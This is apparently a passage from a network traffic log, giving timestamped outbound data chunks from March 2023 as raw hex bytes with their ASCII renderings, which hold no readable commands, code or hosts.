5c fd aa be 0b fe 8e 73 89 a0 e7 21 6c ed 93
                                                                                        Data Ascii: wZy]PRl0l*<gr2G>{c'7_AMO:mXwG`cgOSM[^U>D]{M]T?xE"Q6_s=)ohswN?`N<dv?cxl~`ca/57\s!l
                                                                                        2023-03-08 10:35:12 UTC400OUTData Raw: b9 a4 53 d8 d9 ae 44 e9 fb b7 12 e9 3a 9f 60 a1 5a db fa ea 3a b6 95 fc 6d 7c f5 7a d4 d8 b1 0a 1d 7e f0 b4 15 6e a3 1f 1e ed 18 7f c5 83 7d 76 db 27 fd 73 01 14 85 a6 a4 a4 7b d2 49 0e a1 2a 5c d9 da e1 62 93 9b cf 8d 1c 6a 95 7b 0e 00 3f ea 77 f4 d7 bf ff 5b 38 00 bc 14 ef 8f fa e4 af bc 5d 0f 00 3f 73 78 b5 1f 00 ee e2 41 04 95 96 95 4f fd f1 5d 63 28 a9 ff 59 d4 14 63 cd 78 61 7a 27 03 fb ae f2 c9 7f df 69 f7 e8 ac c3 bd 08 b7 5b 8c 0e b4 f0 5f 6c ec c6 0f 9e 96 c7 57 e0 ba d9 27 9d 63 5e ee 79 0d c5 fe 3c 63 59 74 ce a2 58 cd f4 8d 57 94 c3 16 db ca 61 d1 23 89 43 87 05 dc 9a 59 b3 39 c4 cb af c6 72 58 97 59 9e 38 e8 a9 07 7c 18 9b 5c 67 e8 f8 ca 2f 06 e3 67 c7 f3 2c 7a 4d 47 ba c0 ef 85 c5 e1 e0 d2 1b b8 0e e0 de 1c 00 ce ba 94 f4 c6 e5 ac 8f 5c 1c
                                                                                        Data Ascii: SD:`Z:m|z~n}v's{I*\bj{?w[8]?sxAO]c(Ycxaz'i[_lW'c^y<cYtXWa#CY9rXY8|\g/g,zMG\
                                                                                        2023-03-08 10:35:12 UTC416OUTData Raw: 21 20 12 28 99 3a 90 04 c4 1f be f6 9d 58 5c 3a 50 83 a6 e4 81 a8 eb 71 91 be 29 db 02 07 03 1d 3d a9 40 6f de c0 8e eb e6 f9 93 ca 4d f5 03 3d d4 61 21 5e 81 d1 03 13 5d ec 38 96 71 c8 12 5f 4e 63 e4 f7 a7 bf e3 73 f1 ac 67 3f 1b 5b 9f cc 38 7a 7d f7 af dc 81 e7 ff ce dd 93 e0 33 1f 73 02 cf f8 d4 73 f8 12 17 f7 9c de e2 0e bf fe ee fb f1 d2 b7 5d c4 1b 3e b0 1f ba 5f f2 a4 d3 f8 d5 e7 3e 36 f0 d2 49 b9 dc 41 fa 27 c0 cf ff b1 e7 e3 bf fd 99 ff 10 f4 d5 3a a2 c4 8f 07 78 4d fb ec 4a f6 eb 35 50 ae c8 32 c1 7c 64 7c c5 b3 d6 5f f8 1e 31 ad 01 76 5f 64 f1 6d 69 6e fb a7 f9 34 ec e4 d6 89 b6 e6 59 2f 04 d7 d0 ad 6c c9 79 fc b5 f5 fa 3c 23 ca 7e c5 03 bc a6 fc b7 21 a7 b1 95 47 fb 9c 68 13 6a 6b 1a 36 ac ba 12 6b f3 ba 9f db 11 fd 59 14 d8 fa 95 ba 3d 37 21
                                                                                        Data Ascii: ! (:X\:Pq)=@oM=a!^]8q_Ncsg?[8z}3ss]>_>6IA':xMJ5P2|d|_1v_dmin4Y/ly<#~!Ghjk6kY=7!
                                                                                        2023-03-08 10:35:12 UTC432OUTData Raw: 70 15 97 69 e7 c7 ba e6 9b 16 4e 9a 10 a2 3b e6 1f 7e 2a af 93 49 ac 69 96 d7 85 f6 01 d0 bc d2 e4 bf 20 a5 f7 f8 05 8b 9e 75 3f 05 a1 2e 7b 5e 82 d3 ed 31 4d 68 3c 52 fb 42 34 59 63 10 bf df df a4 e4 e2 91 92 c7 eb a7 e8 e6 bf 15 00 65 2f 15 c0 3a d0 d5 68 a1 d0 9b c1 a4 37 bb 81 42 3e a4 43 15 00 23 a6 6c ae 9a fd 88 2f 0c 68 be a5 0a 8d 57 68 11 9c 1b 49 90 04 bc 7f d4 93 8e 49 c8 ea 26 19 cf 48 e4 b9 93 91 ec 28 9d d3 8d cc ab bc 2e b4 76 10 6d 9e 8e d3 e2 96 e7 c6 37 4f 63 91 d4 f6 6b 93 35 13 35 fe 02 fb 7c a3 bb 1a 9f 2c 01 36 ba a9 90 85 df e8 49 de c6 6f 72 ad 41 d3 31 24 97 76 e6 1d d7 ca 16 ee f2 b2 b6 6d ae cc 57 23 e7 b9 92 c2 2d 6f f9 69 83 d4 3c 91 16 2a ff e6 0b 4f d2 23 89 51 f4 62 2e e2 89 b5 bc db 1c 97 dc 42 55 7d b2 f8 2f cc a3 7d ee
                                                                                        Data Ascii: piN;~*Ii u?.{^1Mh<RB4Yce/:h7B>C#l/hWhII&H(.vm7Ock55|,6IorA1$vmW#-oi<*O#Qb.BU}/}
                                                                                        2023-03-08 10:35:12 UTC448OUTData Raw: 54 0f f8 5c 21 10 75 8e 43 db 5c 18 c2 2f c9 c0 dd d5 34 c8 77 f2 18 bb 13 03 0d 15 b2 ca 04 bd 4f c4 42 5b 6f 68 7c d3 5e 77 92 70 de 7a 31 3c a6 00 a0 01 48 62 47 1b 50 a8 c6 67 e5 15 d0 07 80 fe 9d 9c f1 6e b6 8b 4f 9d e8 f1 8e 8f dc 00 1c bb 08 ef 7e fd 3b 70 95 0f 00 ef b8 1d 2e e4 c3 bf b1 18 71 1b 9c 9b a8 8d a4 de 4b 06 95 ca 1d 01 39 91 d7 e4 69 96 a1 40 2a 28 61 db fc 4a 84 32 39 d8 20 29 53 9a 1d 63 6e b2 0b a1 3a 32 f5 a0 07 97 c8 a1 92 95 5f 39 ca 4f c5 fe 64 81 e7 72 df fb 3e 02 bb 3b e7 e1 dc f3 2e c0 aa db 3d eb 80 fc 0d c0 3f ae 3f 02 a2 05 39 30 ce 31 bf f3 bc 0f 46 b1 09 07 4a ee 56 23 71 86 d8 7f fa 99 47 e1 99 8f be 48 56 ba 14 74 43 82 2f aa d8 73 da 9f dc 05 5f f4 56 c9 b2 d2 2c ed 05 df dc 93 33 e9 c5 1f ae 34 1e 12 4f f8 87 af 37
                                                                                        Data Ascii: T\!uC\/4wOB[oh|^wpz1<HbGPgnO~;p.qK9i@*(aJ29 )Scn:2_9Odr>;.=??901FJV#qGHVtC/s_V,34O7
                                                                                        2023-03-08 10:35:12 UTC464OUTData Raw: 0a fa 8a ad a2 98 c3 51 e3 92 0d 29 7b c1 56 63 68 e5 b7 0f 76 17 39 2c a2 53 ee f9 f7 89 ea e1 91 08 b4 e9 3b dd f8 24 6b fb ca 0f 04 a8 2c 7c d3 17 85 d8 1e 43 00 72 8e 28 4d af 8b 41 81 fa c1 02 47 29 5e ab c3 f4 58 fd 36 bd 6a 33 49 5b 48 22 77 c2 c8 a6 5f a1 e6 45 ea b6 21 92 54 27 9d 56 d3 a6 e5 44 39 b0 a0 fa 37 7a 97 b4 c5 98 5c 5c a7 58 94 21 bf 0b 7e 23 3d ef 8c 3b 39 64 ce 69 e0 59 21 45 9b fb 43 e6 b7 34 27 d3 7f ee 29 b9 dc 16 60 aa 61 d8 17 38 c3 52 e3 22 38 33 1c e6 35 e1 92 a3 ce 54 4e 8a df f6 e1 44 7f 8a 96 65 fc b6 99 28 90 f2 31 a1 8d 92 23 af 94 ba 4f 2c 38 8b 36 0c 3f f1 39 77 93 d7 ed 9c 97 54 cc 55 fb d9 14 39 c6 64 ba b5 c1 7f 63 2c e1 a6 fc cc 7c 75 4b 8b 33 a3 67 be d2 94 74 ac 6e c0 d6 f8 ea bc d2 22 7b 32 6d 92 6a fd f6 f8 d2
                                                                                        Data Ascii: Q){Vchv9,S;$k,|Cr(MAG)^X6j3I[H"w_E!T'VD97z\\X!~#=;9diY!EC4')`a8R"835TNDe(1#O,86?9wTU9dc,|uK3gtn"{2mj
                                                                                        2023-03-08 10:35:12 UTC480OUTData Raw: 05 32 ed b7 e2 6c fa 5d 7c 64 c6 96 eb 9c 76 e9 e5 a4 5e 7a d5 8e 54 3e d3 45 67 30 cb 27 a6 f4 1a de d4 c9 c4 4a 9d 0f 99 f4 88 84 4d 3f 48 c9 c8 0d 48 ea 3d 75 6b 66 93 ea 2e 84 5c f9 ab e3 59 97 9c 65 45 fe cd db d7 4a d3 ed f5 1a af 33 22 d3 67 d9 33 4e a7 7a 22 4a a6 1f 2b e5 fa 18 53 5b dd 5f 4e ca 06 49 94 d9 8d 8c 75 8a a7 3e 72 69 58 ea 7e 31 4e 4a bf 39 14 6e 1e da 7c d9 1c 69 7d 43 30 46 0f ed 27 32 65 24 31 56 36 f5 0a 0f 1d b3 ff b4 23 19 31 51 85 a2 b2 91 9d fd cb 07 20 b9 c6 66 0b 58 d7 0b 49 e0 40 4e 36 03 46 eb 28 56 56 bf 88 4f 65 47 28 fe 1f 81 1e d4 0d c7 00 65 20 fd cd a0 67 d3 c1 a0 b1 0e 21 b7 28 f6 e5 86 3c 48 f9 16 6a 99 80 ce 41 4d e7 90 7c 61 79 36 52 f1 04 c3 9f 2c 02 d9 d7 6d f6 09 96 fc d5 3a 2e 84 35 b6 9e 47 66 20 25 41 88
                                                                                        Data Ascii: 2l]|dv^zT>Eg0'JM?HH=ukf.\YeEJ3"g3Nz"J+S[_NIu>riX~1NJ9n|i}C0F'2e$1V6#1Q fXI@N6F(VVOeG(e g!(<HjAM|ay6R,m:.5Gf %A
                                                                                        2023-03-08 10:35:12 UTC496OUTData Raw: 38 26 7c c9 69 bb cb 4f d1 7c 8e 14 71 41 2b 00 be e3 de 87 a6 02 e0 ef b9 00 78 3c 02 57 54 00 f4 68 eb 81 cd ab 8d cc a0 bc 16 24 e1 9b 43 8a 9c 92 c4 fa 9e 56 54 88 9a ad 82 1d 51 8c f7 0a 6b bc 3a 2c 15 36 31 99 e3 7a 61 1b cf d0 17 86 e1 dc 06 25 a6 e9 8a ab 6c d9 15 d9 78 83 98 80 79 81 b4 6e 92 23 ec 0b 52 9f 5c 42 ac 8e b6 88 2b 36 c8 b4 6b fc a6 17 b0 14 b1 dd 04 a6 53 0b 25 bc 5d f8 fe 00 27 52 81 a6 1e a9 5c 87 9d b8 0d 8a 27 0a 1a 0c a8 5b 88 a4 48 8a ce d3 19 0f 4c fc 80 57 d8 91 e9 8b 35 d1 15 cc 5e aa 1c fa 00 46 72 1a 3b e6 39 6b a1 54 43 92 c1 8d fc 1b 4f 12 b0 3c e8 ca a8 73 24 93 26 13 36 bf 86 64 f2 c8 2e 37 e1 3d 3b eb 24 86 39 2e 9c 72 0c e9 73 4b cb 57 9c 99 b9 a1 8d 65 d3 d8 89 b4 5e eb 58 63 0f 4e c3 73 19 83 75 39 1d b9 8c a3 e8
                                                                                        Data Ascii: 8&|iO|qA+x<WTh$CVTQk:,61za%lxyn#R\B+6kS%]'R\'[HLW5^Fr;9kTCO<s$&6d.7=;$9.rsKWe^XcNsu9
                                                                                        2023-03-08 10:35:12 UTC512OUTData Raw: f9 65 ec 62 23 b8 7a 07 c8 7d 38 5e 00 ce 1a fb ea 3c e1 91 a7 9f c7 d3 37 4e f0 d8 93 57 f1 23 3f fc 13 78 fc e1 47 80 ab 37 30 29 f7 eb 05 60 78 0b 77 40 7a 33 ef 40 23 a7 ce 6d c9 f1 01 23 bb 6d 97 2c 41 2a d1 99 8c 85 d7 75 16 b0 35 05 36 be 0a 5e 94 a2 38 c2 8f 7d bb 05 b1 76 e4 2e 08 25 d5 d2 8a be 20 5d 4e 36 3d b2 41 eb 78 fe 86 d1 72 9c 20 d4 0d 7a a2 2e ae a3 6d e2 5a a4 8b 8d ba 34 f5 3b b9 cd 61 32 57 48 52 2a da be 5a 6b d5 51 d0 f1 03 79 97 8d 85 24 0d a2 91 d4 d1 a8 f0 1a c7 fa 66 1c f9 60 f5 03 43 3a d4 c1 87 36 24 49 54 35 60 f5 5f 89 88 05 2a cd 47 59 68 52 42 f1 b7 b5 6c c8 6d fe bb 7e 07 1b c5 f0 55 c2 77 ac 6a 7f 18 84 4e c6 6d 67 a1 17 dc d6 25 9d fa a9 6b 27 9f e9 0b c0 1c 2b 63 68 11 2d 3d 73 9f ee e6 4b 36 46 e4 d3 da 8d 34 06 25
                                                                                        Data Ascii: eb#z}8^<7NW#?xG70)`xw@z3@#m#m,A*u56^8}v.% ]N6=Axr z.mZ4;a2WHR*ZkQy$f`C:6$IT5`_*GYhRBlm~UwjNmg%k'+ch-=sK6F4%
                                                                                        2023-03-08 10:35:12 UTC528OUTData Raw: e0 25 0f e3 6d e5 e6 c8 fa 8c e0 4f 29 11 ef b8 f1 05 78 c1 97 80 4e ec 10 21 a9 45 1a e8 ba a3 07 d1 8b 84 d6 0b fd 30 c5 f4 26 81 1e 0c c9 e8 66 67 db 78 3b 77 05 b9 3e c7 e6 a1 03 8e 4b 5c 2c ce 76 3e 16 fe 01 e4 dc 05 60 ea 64 3c 23 bd f7 bb a7 53 f7 20 cc 13 70 50 b8 65 9e 9b a7 19 6e 56 93 1f 27 db fb c1 b9 be 15 08 bd bc ed e7 63 57 63 3b 32 97 b7 7f ed 57 e0 d7 7e f3 f7 f0 c0 fe 02 d0 b6 a3 cd 65 fe 97 f5 53 fc 3a fc d0 b9 80 21 27 79 f2 9e d9 f1 53 1e 50 2a 59 8f cd 57 8f f6 78 00 f9 81 73 30 2f da 8f aa e9 e6 ce a0 e3 3c 60 e9 b9 8f b9 38 a7 e2 b9 25 d3 b8 fd dc 06 f4 97 97 f0 6f bb f4 73 8b 30 62 93 6e e4 59 f0 50 b5 6f af 8f 65 d6 37 3c d6 ac 3b ca 92 be cc ae b2 59 a5 be a9 01 2f 39 be f8 fe a0 73 13 0a 3d 48 02 60 d0 6d 0c 88 d5 7d c2 6a 87
                                                                                        Data Ascii: %mO)xN!E0&fgx;w>K\,v>`d<#S pPenV'cWc;2W~eS:!'ySP*YWxs0/<`8%os0bnYPoe7<;Y/9s=H`m}j
                                                                                        2023-03-08 10:35:12 UTC544OUTData Raw: df e8 a5 3c a3 f8 2e 71 3c ce e9 ac 7a 99 3b 75 27 39 11 40 1a b4 2e 75 2d cc f6 fd 41 d2 a8 a6 2c 59 c1 62 b4 2c 90 1d 83 e7 6d d7 09 b2 a1 c6 ea 63 a6 2a 9e 3d ab 04 13 3b 69 fd 6d 67 df ae 4b 08 a4 17 30 86 04 68 0e f6 1f 64 1d 48 56 ac d5 4d f5 14 47 da 18 05 ed 0f ca 03 dc e8 01 92 3a 38 a5 20 3e a9 5c f5 25 54 14 cc 6a 22 c3 64 99 04 e1 47 90 94 2e 24 51 43 22 92 2c 4a 6d fd c5 1e d3 45 4a cf ce b4 07 cc 24 45 1b a9 9d 14 2d 79 9b 4f f3 0f f9 23 25 80 2e f9 d7 08 52 ba 6d 6d 72 32 2b 7a ff ce 60 73 14 92 32 90 d5 8f c9 ce ce e4 76 57 dd a4 ee fd 95 6b ce 25 27 31 35 5f ba 86 82 80 72 99 62 b9 c2 80 58 ea d6 83 ae 92 9f 55 8a bd 58 52 48 ea 5e 5f 53 a8 b9 4c b4 98 1c 0e 74 b0 72 02 9f fb 65 e9 82 e7 00 e5 cf d3 7b 74 f6 42 9c f8 8f fe a5 43 40 07 80
                                                                                        Data Ascii: <.q<z;u'9@.u-A,Yb,mc*=;imgK0hdHVMG:8 >\%Tj"dG.$QC",JmEJ$E-yO#%.Rmmr2+z`s2vWk%'15_rbXUXRH^_SLtre{tBC@
                                                                                        2023-03-08 10:35:12 UTC560OUTData Raw: 80 af 05 e5 93 4c 48 15 32 25 90 14 2d 58 71 52 b8 bb 75 82 97 00 d1 4f 7f f1 7b 71 e7 c5 71 67 29 50 a7 3c 87 ca 07 ba 68 a1 a0 f7 93 ef 62 43 d7 03 f2 2b 76 34 ab 58 5d f0 39 9f f6 c9 78 c3 db de a5 03 c0 f7 62 ee 0f 98 d1 26 a4 ef 17 8b d1 69 29 f4 e0 c2 74 39 5f c7 59 2b 6f 41 c5 7d e5 4b 5e 70 ff ee ab 97 ff 42 c9 ae d5 a5 50 57 3f f6 7b c5 d6 8d ae 75 2c f5 a8 f3 ef eb de ea df 43 7d 44 40 4f ab 4e 13 ed fd d3 d3 de c7 3d 6d bb e6 bf f7 a3 fd e3 b4 a2 c7 5c 55 ff 20 ea d0 f2 ad 64 89 e7 05 6d 0c c4 b6 c7 65 2e 72 63 e3 97 86 d5 73 1f db 8c 7d 7d 99 83 f5 9a 3f 43 cf d3 bc e8 2d ff 0a 75 6f 04 7b ef 50 f5 f6 c9 bd 4f 1d a3 97 77 f9 b4 59 79 39 43 65 9f ae 15 9b 6c 82 b2 d0 bf f0 c6 7d 21 34 5a 5e e4 d3 74 43 e8 41 8e 7a 1e a7 c8 16 5e 59 6f f9 db b4
                                                                                        Data Ascii: LH2%-XqRuO{qqg)P<hbC+v4X]9xb&i)t9_Y+oA}K^pBPW?{u,C}D@ON=m\U dme.rcs}}?C-uo{POwYy9Cel}!4Z^tCAz^Yo
                                                                                        2023-03-08 10:35:12 UTC576OUTData Raw: ec 47 54 92 9d 2e 9d e0 89 dd 4e 9a 5f 4a 19 b9 73 80 5b f2 77 87 27 d7 fa b6 b1 25 15 43 7b 81 9d e8 b4 bd 86 e4 5d af f3 20 b5 28 00 c6 23 45 87 47 9b d3 a9 1a d1 e9 33 a4 15 00 29 99 0b 80 7b b9 81 bb f1 20 fe f7 33 8f c7 23 ef 79 12 ee e6 02 e0 47 37 f0 aa b7 7c 12 ef ba fa 96 2c 00 ce 0b ba 8d 23 60 fd 05 e0 5c 34 f4 bc 58 97 ed de 72 03 9e f0 35 67 45 01 f0 6e a7 03 d7 69 ba 37 5d 75 63 14 00 6f da 75 27 7d 1c 14 94 88 69 0f a0 b8 e4 04 73 7d f8 b9 00 48 12 2c 6b 7a 77 26 5a 01 70 16 4a 18 1a c9 c0 5b 01 d0 cf 59 af d7 9d 24 c8 ec 45 ef 17 24 d1 81 88 a6 02 a0 a1 fd 91 ba b7 7d fe c4 b0 9d 6e 31 f4 3a b1 c6 bd 6f 86 33 ca 52 7a 1a 41 12 b3 ea 66 d6 23 1a 65 41 56 66 70 fa d0 0b 74 32 74 55 c7 f3 9a ed 6f a5 86 33 f9 37 f4 5c 86 ee 24 e5 c3 58 f6 55
                                                                                        Data Ascii: GT.N_Js[w'%C{] (#EG3){ 3#yG7|,#`\4Xr5gEni7]ucou'}is}H,kzw&ZpJ[Y$E$}n1:o3RzAf#eAVfpt2tUo37\$XU
                                                                                        2023-03-08 10:35:12 UTC592OUTData Raw: ed 26 c9 b4 33 de f6 90 d4 39 54 37 6f bb 4e 8e 76 4d 27 ec 1d 77 63 18 2e eb 55 33 d6 f3 d3 e2 48 d5 2a 34 81 c4 c9 84 c1 d2 d0 ab ef 74 91 a9 4f 7a 0d c0 f2 3e 63 a9 91 a9 df d8 7a f3 69 e8 1d 83 f6 e7 7b 44 6e 67 6b 6b 98 6f 1c c6 ee 6e 13 7b 77 6d e0 41 fb f7 e1 ee 67 00 37 dd 06 bc eb ea 9b f1 99 db 0a 8e a8 f0 d7 63 97 ee cd 19 e8 2d d3 fb d8 6c d6 61 73 fa fe bc 4d 24 a4 26 99 c8 9c 7f 52 3c f9 99 e6 75 50 91 68 c0 a5 33 e0 b7 03 f1 17 75 ab 17 0f b5 93 13 c7 f5 b9 57 b0 34 c1 44 25 cd a6 1e 92 f3 a5 18 c9 9c a8 cd de 1f c5 69 d1 77 86 05 95 6a bf c0 3b 06 82 cc 79 8f 41 35 54 62 af 85 4d e3 23 ab 0f e7 50 af 3f b1 9f 9b 33 69 e9 f3 4e 60 10 a3 c7 cc 86 9b 73 74 ba 8f d6 ba 39 4e 5e 2f 38 75 6d 8e 33 55 04 fc 2a 55 fd 1e 79 97 3d b8 df 5d d7 a1 9a
                                                                                        Data Ascii: &39T7oNvM'wc.U3H*4tOz>czi{Dngkkon{wmAg7c-lasM$&R<uPh3uW4D%iwj;yA5TbM#P?3iN`st9N^/8um3U*Uy=]
                                                                                        2023-03-08 10:35:12 UTC608OUTData Raw: 98 2e 81 d7 5f 0c 7e ab f4 fd 77 e5 c1 85 88 89 4c 3a af 7f e1 b9 78 d2 7f f8 16 15 ca 7e 7d b4 c1 9f e3 e2 d3 7e 18 97 1c be 11 17 fc c2 9b f1 4a 3c 0b fb 7f fc ed b8 e8 8f 0f e2 c2 ff ae 62 e0 6f ea 7f 17 2c fb 8a 79 5e 05 f8 97 82 f2 8b fe e9 59 a8 78 f8 7d 71 e0 03 a7 83 c7 ef 53 3f dd 92 a1 eb 39 30 e0 0d 21 d9 d0 01 96 55 8a 4d 7a db 75 2a 00 7e 83 0a 80 bf 36 89 bf 09 0d af c2 cb 55 78 f9 fd a7 5d 89 cb ce fb 15 15 00 ff 00 54 31 85 27 9c 81 78 a0 1c bc 1e e7 bf e4 7f 68 8d cf d3 1a df ac b3 f2 83 63 31 34 0a 80 d3 7c bd 1e 17 af 3f 15 97 6c de 26 c7 4b b9 f4 fa bf 4d eb df 38 58 65 2e fe 68 ed ef cf 5f 60 a1 7b 10 5e f6 9e 3f c1 79 ff 66 5d 05 40 ff 1f 92 82 8b fe e8 46 5c f8 a1 97 63 ff 93 81 67 dc ff 25 b8 5c 45 34 c7 e5 22 20 6a 91 54 ce 76 b8
                                                                                        Data Ascii: ._~wL:x~}~J<bo,y^Yx}qS?90!UMzu*~6Ux]T1'xhc14|?l&KM8Xe.h_`{^?yf]@F\cg%\E4" jTv
                                                                                        2023-03-08 10:35:12 UTC624OUTData Raw: 4c 3e 3b bb e0 2c bb f5 bc 96 52 53 e9 c7 58 b4 18 0b f2 bb c1 45 0a c9 8b a8 2d 74 5a 4c 53 6e 7b 69 f5 47 bd c4 40 85 9c fd 93 89 a7 7d e2 d0 95 6a ba 08 2a 68 5b a8 a9 ea 83 ed 46 1f 42 da fb c1 88 a6 5f e7 ab eb 3e b6 f6 28 4b bd 08 a1 0f a6 8e 23 2f aa a3 1a 74 7f 3e d5 a3 45 b9 fe 14 39 00 f4 9c e1 a2 79 18 44 6b 71 7b 9f b8 99 d9 78 6b dc b4 5b d9 80 cc 7b 19 a9 1c f5 fe 24 27 c5 13 f4 78 6e 50 be 94 08 71 54 63 8c 94 a3 da 91 a2 85 53 eb 57 0c a5 3f 8a 45 5d 3f a4 10 00 64 42 a8 38 ed a3 fc 98 13 fe 85 8b 0d ea 3f 43 f3 48 1a 85 c7 20 09 92 41 17 c1 e2 45 2c 49 93 39 8f 10 62 08 bd d1 32 f1 51 69 fb 93 40 2a 14 e8 f4 43 47 ec 3a be 84 aa 92 8b 75 56 65 13 36 fb 4a 47 5c 15 4f 30 24 b0 9e 9b 28 52 fe db 78 95 16 c8 aa dc 25 72 5e 5f fd ae d4 b4 53
                                                                                        Data Ascii: L>;,RSXE-tZLSn{iG@}j*h[FB_>(K#/t>E9yDkq{xk[{$'xnPqTcSW?E]?dB8?CH AE,I9b2Qi@*CG:uVe6JG\O0$(Rx%r^_S
                                                                                        2023-03-08 10:35:12 UTC640OUTData Raw: eb 76 6c d7 97 58 88 52 91 0a 82 75 5e 17 fe a5 64 d8 37 b1 48 82 54 ac 53 9e 72 5f 15 22 f8 30 02 dd 7f a0 78 05 a1 75 21 a5 6f 3f 82 90 9e d9 80 ec 4c 7b 0e 82 94 5e f0 e5 97 a4 1c 0c ba 1c d3 87 d7 0e f5 45 b8 b9 1d 20 1d 19 78 1f a4 96 08 b3 da fc 45 ba d2 5f 87 10 12 3e 04 c3 cc fe eb 38 a5 8e cb 4d 1d cf 71 5a 4f 4e 49 3b 34 a1 70 56 7e 93 fb cc 7a b2 f3 6b 17 41 0f c6 f6 36 ff ec c5 c2 12 ba c2 04 49 e5 35 d0 ce 9f e2 24 67 5a e2 a8 9e 27 39 f3 4b 4b 64 48 dd e5 fe 31 46 ca af 55 05 4d bb 91 66 18 6b 2d 69 a5 29 18 ac 79 2c c9 06 31 fb 83 4a e3 0b 05 7a 5f d6 5f d3 50 e9 79 22 51 56 f9 59 cb ad f3 db d9 b4 5f ce 73 4f 7a 32 db 5a e4 36 7f 91 0f 99 94 b5 8e 4d 3a 1e 6b 7e a5 ba b3 b6 75 08 e1 c2 ce 8e bc 7f 43 f2 2c ba f4 d3 3b 20 b7 79 fb e4 a5 53
                                                                                        Data Ascii: vlXRu^d7HTSr_"0xu!o?L{^E xE_>8MqZONI;4pV~zkA6I5$gZ'9KKdH1FUMfk-i)y,1Jz__Py"QVY_sOz2Z6M:k~uC,; yS
                                                                                        2023-03-08 10:35:12 UTC656OUTData Raw: 7c e8 39 3c f9 ec 19 9e 7b 71 c4 74 f7 3e 70 ef 02 38 57 bf 38 57 56 f7 71 6d ba 85 37 df b8 8b ef fe d6 af c7 9f ff e6 c7 f1 88 72 7b ff 73 c0 3f fd e8 73 78 ff ad 82 17 4e 1e c1 05 fd 7f 20 1c 30 4c 3a d2 53 3e ed ff d5 37 4e 22 a4 0f e5 6a 74 aa f7 62 5b 37 f3 2c 76 6f 3c eb 9a 26 d3 d6 7c 77 f3 80 41 b3 04 08 bd b7 35 4f aa 60 3e ec 82 f8 e6 98 36 1c a5 41 cd 73 10 f4 3b ab 1d e0 32 f4 30 37 0a ab 61 84 e9 aa ef 63 d2 12 c0 b5 9d c4 0e 48 e8 d5 5c b0 6d 8e 21 01 48 22 fe 50 50 30 e2 0b ae 75 8b a2 53 cb 99 3e 06 d5 44 d4 ac 32 0c 90 1c f0 5a 0f 98 84 53 3e 8b 3a 21 23 5d 05 27 9e 14 96 36 40 32 94 99 31 2a a6 eb 41 32 ec a1 26 14 36 1b 84 8f 52 a7 ba d0 b8 1c cb b5 1d 2b d3 b4 ed 5d 33 2b 0c c1 9f 8c 82 24 26 6d 4a 01 2c 2e 32 76 da 51 f5 2a 91 a7 69
                                                                                        Data Ascii: |9<{qt>p8W8WVqm7r{s?sxN 0L:S>7N"jtb[7,vo<&|wA5O`>6As;207acH\m!H"PP0uS>D2ZS>:!#]'6@21*A2&6R+]3+$&mJ,.2vQ*i
                                                                                        2023-03-08 10:35:12 UTC672OUTData Raw: 3a ed 99 da 6e 90 3d 7d dd 17 ae 89 0d 02 8a 36 5e fb 80 31 30 55 2e a0 07 92 98 bc 9e 22 88 ac 63 71 fd 90 8d 34 51 f9 c9 7a e9 63 e4 24 f3 f0 29 78 c5 45 3a f6 21 a5 cc 67 91 24 1d f3 0a 9b 01 24 a3 5b 87 24 3c a7 a3 cf 1d 2b ad 3a 21 63 ec b5 6e 5f ee c9 cc d0 4b d6 e0 58 67 9b 3f e4 bf 53 2a b5 ee 66 91 ce 75 30 0a 08 47 df b6 74 67 d7 ab 41 f7 6f d0 9e b4 91 66 b7 0e 0b 1c 9b 0f 9b 62 e6 41 36 1a 2f ab b5 74 f6 9d 64 9c 36 5f 32 e3 b5 7b 9f 4c 1a c7 f2 ad 0e 9b 7e 25 e5 ae da 55 c6 80 8c d3 f2 98 cc 6f b5 32 be f1 df 5b c7 de 82 38 ac 3d f4 85 1b ce eb 2a c2 72 bd c7 c8 2a 13 6b 9b 97 58 20 25 9f 63 33 e8 62 9e 85 9b 3c 39 df b7 fa e0 82 e3 ad 3d 0e 0e c5 03 26 fc ab 76 00 38 a9 4e a4 ee 17 41 bd 10 80 b9 9e b5 46 45 b0 ad 8d a1 bb 58 2a 36 dc 49 e2
                                                                                        Data Ascii: :n=}6^10U."cq4Qzc$)xE:!g$$[$<+:!cn_KXg?S*fu0GtgAofbA6/td6_2{L~%Uo2[8=*r*kX %c3b<9=&v8NAFEX*6I
                                                                                        2023-03-08 10:35:12 UTC688OUTData Raw: 89 0f fc 14 7d 52 84 f4 fe 75 fe 13 e0 27 b5 00 f8 e2 8f c2 25 3e 43 f9 6b 25 ba d4 bc 49 9d 08 78 63 d1 5d 9e bb 45 32 36 d0 6c 6b de d8 c6 07 6d b6 16 64 6f 72 5e 23 b9 50 91 45 fe 07 7f e3 d3 f1 f9 9f ff 05 3a d8 bb 49 7f e1 eb 4a 01 b0 58 f8 21 96 4a f6 9f f4 df be 13 3f 7b ff 55 09 c0 9f ff d0 a7 e1 5f 7c e6 73 34 bf 10 e1 ed 2a 5c df 0b d5 6d e4 dc 02 a0 ff 04 58 b1 6d e3 46 ea 20 f7 f3 ea 79 1b b4 26 bb c6 06 5d cb 01 de 4a b7 dc 9f 1b 79 e4 fb 3e 4f 6a 4d 28 72 1a 35 f7 da e2 71 d9 00 9b 3b f1 f0 fd 3f 15 fb 46 bd 8c 92 5e 56 84 fe 97 12 42 26 01 f1 89 09 10 4f 51 fa e1 46 02 85 ab c3 f0 b2 e5 bf 01 48 12 fd 95 63 ac 19 21 12 7c 4d e7 6a 65 cf 76 be 84 c7 f9 89 dc ed 51 5b d3 57 d1 84 9c c7 9c e3 fa 49 b7 76 6e a4 f6 6a 12 8b 0f 59 e8 3f fc 2f 3f
                                                                                        Data Ascii: }Ru'%>Ck%Ixc]E26lkmdor^#PE:IJX!J?{U_|s4*\mXmF y&]Jy>OjM(r5q;?F^VB&OQFHc!|MjevQ[WIvnjY?/?
